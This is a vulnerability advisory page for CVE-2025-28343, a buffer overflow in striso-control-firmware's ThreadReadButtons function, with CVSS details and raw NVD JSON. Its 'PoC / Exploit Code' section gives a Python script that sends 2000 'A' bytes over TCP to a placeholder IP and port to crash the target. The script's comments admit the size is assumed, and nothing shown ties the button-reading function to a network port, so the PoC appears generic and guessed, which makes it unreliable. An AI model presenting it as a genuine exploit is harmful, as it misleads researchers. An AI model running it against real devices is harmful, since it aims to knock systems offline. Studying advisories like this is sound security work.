Security Vulnerability Report
中文
CVE-2025-28343 CVSS 7.5 HIGH

CVE-2025-28343

Published: 2026-05-13 16:16:35
Last Modified: 2026-05-14 13:16:16

Description

striso-control-firmware 54c9722 is vulnerable to Buffer Overflow in function ThreadReadButtons.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

striso-control-firmware 54c9722

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # Target IP and Port (Replace with actual target) TARGET_IP = "192.168.1.100" TARGET_PORT = 8080 # Create a payload larger than the buffer size in ThreadReadButtons # Exact size depends on firmware analysis, assuming a large padding payload = b'A' * 2000 try: # Establish connection s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_IP, TARGET_PORT)) # Send malicious payload to trigger buffer overflow s.send(payload) print("[+] Payload sent successfully.") s.close() except Exception as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-28343", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:34.967", "lastModified": "2026-05-14T13:16:16.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "striso-control-firmware 54c9722 is vulnerable to Buffer Overflow in function ThreadReadButtons."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://github.com/striso/striso-control-firmware/issues/5", "source": "[email protected]"}, {"url": "https://github.com/striso/striso-control-firmware/issues/5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}